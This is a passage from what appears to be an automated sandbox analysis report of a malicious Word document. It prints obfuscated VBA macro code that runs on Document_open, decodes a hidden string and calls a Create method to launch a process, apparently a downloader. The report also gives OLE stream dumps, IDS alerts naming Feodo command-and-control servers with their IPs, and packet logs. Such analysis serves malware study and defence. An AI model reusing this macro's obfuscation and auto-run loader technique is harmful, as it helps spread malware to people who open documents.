            End If
            tLOwC = tLOwC + 2
        Loop
    Next
avenCHqCM:
njcnja = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
nnjasd = Bcdtdfsryv3bc(njcnja)
   GoTo hfACeBO
Set lIOoEHE = UvPjdXBJH
    Dim FfmNDT, FrGcEy, uJJmytp As Long
    Dim MIQyJC As Word.Paragraph
    Dim cxLJIGiD() As Byte
    For Each MIQyJC In Sky5mdbfre3xe7q8.Paragraphs
        cxLJIGiD = MIQyJC.Range
        dscc = "sadsaccc" & MIQyJC.Range
        FrGcEy = UBound(cxLJIGiD) - 1
        FfmNDT = 0
Set fLcUFFJA = hrhpx
        Do Until FrGcEy > FrGcEy
            If cxLJIGiD(FrGcEy) = 46 Or FrGcEy = FrGcEy Then
                dscc = "sasdsacc" & (FfmNDT / 2) + 1 & " to " & (FrGcEy / 2) + 1 & MidB$(cxLJIGiD, FfmNDT + 1, FrGcEy - FfmNDT + 3)
                FfmNDT = FrGcEy + 2
            End If
            FrGcEy = FrGcEy + 2
        Loop
    Next
hfACeBO:
H2lplpiprsq2y.Create nnjasd, Bf0256837rexe, A95ize8agn0fuh
   GoTo immQJ
Set NIEFpmJ = fgxZE
    Dim QqMgHpfGB, mvXsJDCI, dKpjABOAD As Long
    Dim fQyMHGCJ As Word.Paragraph
    Dim LxgTE() As Byte
    For Each fQyMHGCJ In Sky5mdbfre3xe7q8.Paragraphs
        LxgTE = fQyMHGCJ.Range
        dscc = "sadsaccc" & fQyMHGCJ.Range
        mvXsJDCI = UBound(LxgTE) - 1
        QqMgHpfGB = 0
Set IPiQsIN = tFqUPL
        Do Until mvXsJDCI > mvXsJDCI
            If LxgTE(mvXsJDCI) = 46 Or mvXsJDCI = mvXsJDCI Then
                dscc = "sasdsacc" & (QqMgHpfGB / 2) + 1 & " to " & (mvXsJDCI / 2) + 1 & MidB$(LxgTE, QqMgHpfGB + 1, mvXsJDCI - QqMgHpfGB + 3)
                QqMgHpfGB = mvXsJDCI + 2
            End If
            mvXsJDCI = mvXsJDCI + 2
        Loop
    Next
immQJ:
End Function
Function Bcdtdfsryv3bc(Ajy4p4krsdew9uay)
On Error Resume Next
   GoTo lcxHPB
Set RSCoIAgA = FoVpJCArD
    Dim IZBck, mXwueE, YeeasmCg As Long
    Dim CBOhDJ As Word.Paragraph
    Dim gPiUJUCJ() As Byte
    For Each CBOhDJ In Sky5mdbfre3xe7q8.Paragraphs
        gPiUJUCJ = CBOhDJ.Range
        dscc = "sadsaccc" & CBOhDJ.Range
        mXwueE = UBound(gPiUJUCJ) - 1
        IZBck = 0
Set aetYHHHFP = aOIKG
        Do Until mXwueE > mXwueE
            If gPiUJUCJ(mXwueE) = 46 Or mXwueE = mXwueE Then
                dscc = "sasdsacc" & (IZBck / 2) + 1 & " to " & (mXwueE / 2) + 1 & MidB$(gPiUJUCJ, IZBck + 1, mXwueE - IZBck + 3)
                IZBck = mXwueE + 2
            End If
            mXwueE = mXwueE + 2
        Loop
    Next
lcxHPB:
Mpabacff47znxzxgma = Ajy4p4krsdew9uay
   GoTo GRIeHCUTC
Set dOQMo = VSeBJC
    Dim mbpdgB, BfQqFX, bjyQsJ As Long
    Dim lroNB As Word.Paragraph
    Dim iXiRFIE() As Byte
    For Each lroNB In Sky5mdbfre3xe7q8.Paragraphs
        iXiRFIE = lroNB.Range
        dscc = "sadsaccc" & lroNB.Range
        BfQqFX = UBound(iXiRFIE) - 1
        mbpdgB = 0
Set dPnKGaIH = fHEAXGB
        Do Until BfQqFX > BfQqFX
            If iXiRFIE(BfQqFX) = 46 Or BfQqFX = BfQqFX Then
                dscc = "sasdsacc" & (mbpdgB / 2) + 1 & " to " & (BfQqFX / 2) + 1 & MidB$(iXiRFIE, mbpdgB + 1, BfQqFX - mbpdgB + 3)
                mbpdgB = BfQqFX + 2
            End If
            BfQqFX = BfQqFX + 2
        Loop
    Next
GRIeHCUTC:
Gzkjanw1nxso6a7rna = Lf24kw93f4sab9(Mpabacff47znxzxgma)
   GoTo NDrVK
Set UXwvP = gYFIC
    Dim rpBOJCg, MDLMBAHzC, IIShQCGJH As Long
    Dim xeQqnwEGH As Word.Paragraph
    Dim YRistJGeF() As Byte
    For Each xeQqnwEGH In Sky5mdbfre3xe7q8.Paragraphs
        YRistJGeF = xeQqnwEGH.Range
        dscc = "sadsaccc" & xeQqnwEGH.Range
        MDLMBAHzC = UBound(YRistJGeF) - 1
        rpBOJCg = 0
Set TNoCFZI = PlYykHypI
        Do Until MDLMBAHzC > MDLMBAHzC
            If YRistJGeF(MDLMBAHzC) = 46 Or MDLMBAHzC = MDLMBAHzC Then
                dscc = "sasdsacc" & (rpBOJCg / 2) + 1 & " to " & (MDLMBAHzC / 2) + 1 & MidB$(YRistJGeF, rpBOJCg + 1, MDLMBAHzC - rpBOJCg + 3)
                rpBOJCg = MDLMBAHzC + 2
            End If
            MDLMBAHzC = MDLMBAHzC + 2
        Loop
    Next
NDrVK:
Bcdtdfsryv3bc = Gzkjanw1nxso6a7rna
   GoTo beeZpf
Set BygJBD = beoayAGAs
    Dim USfrGE, PyJkHIE, tksEqFXE As Long
    Dim lPbZa As Word.Paragraph
    Dim euviCGGE() As Byte
    For Each lPbZa In Sky5mdbfre3xe7q8.Paragraphs
        euviCGGE = lPbZa.Range
        dscc = "sadsaccc" & lPbZa.Range
        PyJkHIE = UBound(euviCGGE) - 1
        USfrGE = 0
Set SJaMAW = FWzgiHG
        Do Until PyJkHIE > PyJkHIE
            If euviCGGE(PyJkHIE) = 46 Or PyJkHIE = PyJkHIE Then
                dscc = "sasdsacc" & (USfrGE / 2) + 1 & " to " & (PyJkHIE / 2) + 1 & MidB$(euviCGGE, USfrGE + 1, PyJkHIE - USfrGE + 3)
                USfrGE = PyJkHIE + 2
            End If
            PyJkHIE = PyJkHIE + 2
        Loop
    Next
beeZpf:
End Function
Function Lf24kw93f4sab9(Yawumzmq1cyapn)
   GoTo HZrrCCPJ
Set YEXZi = noYAHFJkx
    Dim lZIWVW, SeegFDA, UCtihtI As Long
    Dim EWwbyEvG As Word.Paragraph
    Dim ipaAe() As Byte
    For Each EWwbyEvG In Sky5mdbfre3xe7q8.Paragraphs
        ipaAe = EWwbyEvG.Range
        dscc = "sadsaccc" & EWwbyEvG.Range
        SeegFDA = UBound(ipaAe) - 1
        lZIWVW = 0
Set yroaOGI = HsCTGA
        Do Until SeegFDA > SeegFDA
            If ipaAe(SeegFDA) = 46 Or SeegFDA = SeegFDA Then
                dscc = "sasdsacc" & (lZIWVW / 2) + 1 & " to " & (SeegFDA / 2) + 1 & MidB$(ipaAe, lZIWVW + 1, SeegFDA - lZIWVW + 3)
                lZIWVW = SeegFDA + 2
            End If
            SeegFDA = SeegFDA + 2
        Loop
    Next
HZrrCCPJ:
   GoTo zvYxeGGBh
Set EBcorGpdB = IuiADKc
    Dim ZBLQItWK, TyLaL, WygyQ As Long
    Dim vrXECqWF As Word.Paragraph
    Dim UApNCTSB() As Byte
    For Each vrXECqWF In Sky5mdbfre3xe7q8.Paragraphs
        UApNCTSB = vrXECqWF.Range
        dscc = "sadsaccc" & vrXECqWF.Range
        TyLaL = UBound(UApNCTSB) - 1
        ZBLQItWK = 0
Set PTiWFW = nBWRH
        Do Until TyLaL > TyLaL
            If UApNCTSB(TyLaL) = 46 Or TyLaL = TyLaL Then
                dscc = "sasdsacc" & (ZBLQItWK / 2) + 1 & " to " & (TyLaL / 2) + 1 & MidB$(UApNCTSB, ZBLQItWK + 1, TyLaL - ZBLQItWK + 3)
                ZBLQItWK = TyLaL + 2
            End If
            TyLaL = TyLaL + 2
        Loop
    Next
zvYxeGGBh:
   GoTo JQyfEHCFH
Set PAPyDG = ukURCshB
    Dim ORvhuHGGD, NlrKo, EOBHCBBF As Long
    Dim UQnFD As Word.Paragraph
    Dim vLWhdu() As Byte
    For Each UQnFD In Sky5mdbfre3xe7q8.Paragraphs
        vLWhdu = UQnFD.Range
        dscc = "sadsaccc" & UQnFD.Range
        NlrKo = UBound(vLWhdu) - 1
        ORvhuHGGD = 0
Set AtZVIBkE = MoAcLJ
        Do Until NlrKo > NlrKo
            If vLWhdu(NlrKo) = 46 Or NlrKo = NlrKo Then
                dscc = "sasdsacc" & (ORvhuHGGD / 2) + 1 & " to " & (NlrKo / 2) + 1 & MidB$(vLWhdu, ORvhuHGGD + 1, NlrKo - ORvhuHGGD + 3)
                ORvhuHGGD = NlrKo + 2
            End If
            NlrKo = NlrKo + 2
        Loop
    Next
JQyfEHCFH:
Lf24kw93f4sab9 = Replace(Yawumzmq1cyapn, "x [ sh b", V8w_ubg25ws3wu8wgy)
   GoTo SeochBB
Set WmhUJ = bJfJIBEBC
    Dim qucrJCEBy, rjilFB, cQXOHIGG As Long
    Dim TZIFFtB As Word.Paragraph
    Dim aXyHAY() As Byte
    For Each TZIFFtB In Sky5mdbfre3xe7q8.Paragraphs
        aXyHAY = TZIFFtB.Range
        dscc = "sadsaccc" & TZIFFtB.Range
        rjilFB = UBound(aXyHAY) - 1
        qucrJCEBy = 0
Set SeKqFAFNv = cfmpCCej
        Do Until rjilFB > rjilFB
            If aXyHAY(rjilFB) = 46 Or rjilFB = rjilFB Then
                dscc = "sasdsacc" & (qucrJCEBy / 2) + 1 & " to " & (rjilFB / 2) + 1 & MidB$(aXyHAY, qucrJCEBy + 1, rjilFB - qucrJCEBy + 3)
                qucrJCEBy = rjilFB + 2
            End If
            rjilFB = rjilFB + 2
        Loop
    Next
SeochBB:
   GoTo eFdbX
Set UeaVqCIF = yFQRXd
    Dim OnZyDDGUB, KUSkBEC, vJOKJuk As Long
    Dim VADSpA As Word.Paragraph
    Dim CuSGXNGI() As Byte
    For Each VADSpA In Sky5mdbfre3xe7q8.Paragraphs
        CuSGXNGI = VADSpA.Range
        dscc = "sadsaccc" & VADSpA.Range
        KUSkBEC = UBound(CuSGXNGI) - 1
        OnZyDDGUB = 0
Set wMDcH = oVIlzvB
        Do Until KUSkBEC > KUSkBEC
            If CuSGXNGI(KUSkBEC) = 46 Or KUSkBEC = KUSkBEC Then
                dscc = "sasdsacc" & (OnZyDDGUB / 2) + 1 & " to " & (KUSkBEC / 2) + 1 & MidB$(CuSGXNGI, OnZyDDGUB + 1, KUSkBEC - OnZyDDGUB + 3)
                OnZyDDGUB = KUSkBEC + 2
            End If
            KUSkBEC = KUSkBEC + 2
        Loop
    Next
eFdbX:
   GoTo hSmgtNpln
Set bkRdqzBB = XcIBFVflC
    Dim GcgMIFBS, FTLaqR, zIlgcDbCD As Long
    Dim VqFNFwx As Word.Paragraph
    Dim hXmVsAI() As Byte
    For Each VqFNFwx In Sky5mdbfre3xe7q8.Paragraphs
        hXmVsAI = VqFNFwx.Range
        dscc = "sadsaccc" & VqFNFwx.Range
        FTLaqR = UBound(hXmVsAI) - 1
        GcgMIFBS = 0
Set eGrznOJJ = txnfIE
        Do Until FTLaqR > FTLaqR
            If hXmVsAI(FTLaqR) = 46 Or FTLaqR = FTLaqR Then
                dscc = "sasdsacc" & (GcgMIFBS / 2) + 1 & " to " & (FTLaqR / 2) + 1 & MidB$(hXmVsAI, GcgMIFBS + 1, FTLaqR - GcgMIFBS + 3)
                GcgMIFBS = FTLaqR + 2
            End If
            FTLaqR = FTLaqR + 2
        Loop
    Next
hSmgtNpln:
End Function

VBA File Name: Hj8dhqrdh_8498, Stream Size: 701

General
Stream Path:	Macros/VBA/Hj8dhqrdh_8498
VBA File Name:	Hj8dhqrdh_8498
Stream Size:	701
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . b N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 fa 62 4e df 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name

VBA Code
`Attribute VB_Name = "Hj8dhqrdh_8498"`

VBA File Name: Sky5mdbfre3xe7q8, Stream Size: 1115

General
Stream Path:	Macros/VBA/Sky5mdbfre3xe7q8
VBA File Name:	Sky5mdbfre3xe7q8
Stream Size:	1115
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . b . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 fa 62 c2 6b 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Document_open()
False
Private
VB_Exposed
Attribute
VB_Creatable
VB_Name
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Sky5mdbfre3xe7q8"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Ekyjujey2miwyla
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 146

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	146
Entropy:	4.00187355764
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.280441275353
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 540

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	540
Entropy:	4.09323636422
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ec 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 60 01 00 00 04 00 00 00 4c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 d0 00 00 00 09 00 00 00 dc 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6861

General
Stream Path:	1Table
File Type:	data
Stream Size:	6861
Entropy:	6.02856268982
Base64 Encoded:	True
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	527
Entropy:	5.49968943522
Base64 Encoded:	True
Data ASCII:	I D = " { D C 2 3 F 3 6 1 - 8 9 7 5 - 4 E 8 5 - B 2 7 9 - 1 5 E 2 D 2 0 E 1 4 0 C } " . . D o c u m e n t = S k y 5 m d b f r e 3 x e 7 q 8 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = H j 8 d h q r d h _ 8 4 9 8 . . M o d u l e = D u l z 0 g 2 a 3 q q d j s t y 7 . . E x e N a m e 3 2 = " A l 3 m j h l b y h g 8 x a x a v " . . N a m e = " D D " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B A B 8 0 5 3 5 4 3 3 9 4 3 3 9 4 3 3 9 4 3 3 9 "
Data Raw:	49 44 3d 22 7b 44 43 32 33 46 33 36 31 2d 38 39 37 35 2d 34 45 38 35 2d 42 32 37 39 2d 31 35 45 32 44 32 30 45 31 34 30 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 6b 79 35 6d 64 62 66 72 65 33 78 65 37 71 38 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 48 6a 38 64 68 71 72 64 68 5f 38 34 39 38 0d 0a 4d 6f 64 75 6c 65 3d 44 75 6c 7a 30 67 32 61 33 71 71 64 6a 73 74

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 152

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	152
Entropy:	3.89422423899
Base64 Encoded:	True
Data ASCII:	S k y 5 m d b f r e 3 x e 7 q 8 . S . k . y . 5 . m . d . b . f . r . e . 3 . x . e . 7 . q . 8 . . . H j 8 d h q r d h _ 8 4 9 8 . H . j . 8 . d . h . q . r . d . h . _ . 8 . 4 . 9 . 8 . . . D u l z 0 g 2 a 3 q q d j s t y 7 . D . u . l . z . 0 . g . 2 . a . 3 . q . q . d . j . s . t . y . 7 . . . . .
Data Raw:	53 6b 79 35 6d 64 62 66 72 65 33 78 65 37 71 38 00 53 00 6b 00 79 00 35 00 6d 00 64 00 62 00 66 00 72 00 65 00 33 00 78 00 65 00 37 00 71 00 38 00 00 00 48 6a 38 64 68 71 72 64 68 5f 38 34 39 38 00 48 00 6a 00 38 00 64 00 68 00 71 00 72 00 64 00 68 00 5f 00 38 00 34 00 39 00 38 00 00 00 44 75 6c 7a 30 67 32 61 33 71 71 64 6a 73 74 79 37 00 44 00 75 00 6c 00 7a 00 30 00 67 00 32 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 6005

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	6005
Entropy:	5.67360235538
Base64 Encoded:	True
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 682

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	682
Entropy:	6.42612592717
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . D 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . N . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . ) . m . . . . ! O f f i c
Data Raw:	01 a6 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 44 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 4e d7 fa 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d

Stream Path: WordDocument, File Type: data, Stream Size: 114302

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	114302
Entropy:	7.29269826557
Base64 Encoded:	True
Data ASCII:	. . . . _ . . . . . . . . . . . . . . . . . . . . . . . ! ` . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . ! X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 21 60 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e be 01 00 62 7f 00 00 62 7f 00 00 21 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Stream Path: word, File Type: data, Stream Size: 348

General
Stream Path:	word
File Type:	data
Stream Size:	348
Entropy:	7.39752642527
Base64 Encoded:	False
Data ASCII:	. . . . t . . . V 8 ! { . Z . . . . ! . . Q i . ^ m U T . . . . t . . # . . ` . = . . . . . . % . % . . . w % . . . . . c < . . . 5 . I . . . o l ! . . x ] . . . 0 . . . . . . s G . . . X . . % % ~ . . P . . d . . . . E . A . . 4 3 h . . . N . . : ! . . . . . . S . _ . . . . m . . . % - . A 4 . # i . = . . f . z i . . . . ] : . . b . . . . o z . . J . . . . r . . . . } . D . ~ . # > . . . . . . i . . . p . ) . . . . . . ] . K . . A 6 . . . . t . . 1 . . ; . . . . . . . . X . . . w . . 4 . d d . . e . . j .
Data Raw:	e2 09 f9 1d 74 b8 90 b1 56 38 21 7b e2 5a c9 d5 09 cc 21 dc bf 51 69 ff 5e 6d 55 54 f7 a2 ab eb 74 99 d8 23 13 99 60 ff 3d df d9 0b eb a7 9a 25 80 25 87 01 04 77 25 91 9f f9 bf 07 63 3c b9 b3 8d 35 06 49 81 a5 c1 6f 6c 21 9e e0 78 5d 14 b6 d2 30 d3 d2 1b a9 e7 fd 73 47 83 1a da 58 9c 01 25 25 7e b5 a0 50 a3 db 64 18 95 e2 d8 45 18 41 e5 09 34 33 68 e7 98 e3 4e 09 d6 3a 21 a7 95 13

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/17/21-22:57:35.428129	TCP	2404322	ET CNC Feodo Tracker Reported CnC Server TCP group 12	49171	8080	192.168.2.22	195.159.28.230
02/17/21-22:58:24.291871	TCP	2404310	ET CNC Feodo Tracker Reported CnC Server TCP group 6	49173	8080	192.168.2.22	162.241.204.233
02/17/21-22:58:31.780135	TCP	2404304	ET CNC Feodo Tracker Reported CnC Server TCP group 3	49175	80	192.168.2.22	115.21.224.117

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 17, 2021 22:56:44.783550978 CET	49167	80	192.168.2.22	166.62.28.130
Feb 17, 2021 22:56:44.991023064 CET	80	49167	166.62.28.130	192.168.2.22
Feb 17, 2021 22:56:44.991354942 CET	49167	80	192.168.2.22	166.62.28.130
Feb 17, 2021 22:56:44.993495941 CET	49167	80	192.168.2.22	166.62.28.130
Feb 17, 2021 22:56:45.200732946 CET	80	49167	166.62.28.130	192.168.2.22
Feb 17, 2021 22:56:45.223210096 CET	80	49167	166.62.28.130	192.168.2.22
Feb 17, 2021 22:56:45.223351955 CET	80	49167	166.62.28.130	192.168.2.22
Feb 17, 2021 22:56:45.223459005 CET	49167	80	192.168.2.22	166.62.28.130
Feb 17, 2021 22:56:45.224011898 CET	49167	80	192.168.2.22	166.62.28.130
Feb 17, 2021 22:56:45.294106007 CET	49168	80	192.168.2.22	166.62.10.32
Feb 17, 2021 22:56:45.431421041 CET	80	49167	166.62.28.130	192.168.2.22
Feb 17, 2021 22:56:45.509422064 CET	80	49168	166.62.10.32	192.168.2.22
Feb 17, 2021 22:56:45.509637117 CET	49168	80	192.168.2.22	166.62.10.32
Feb 17, 2021 22:56:45.509758949 CET	49168	80	192.168.2.22	166.62.10.32
Feb 17, 2021 22:56:45.724998951 CET	80	49168	166.62.10.32	192.168.2.22
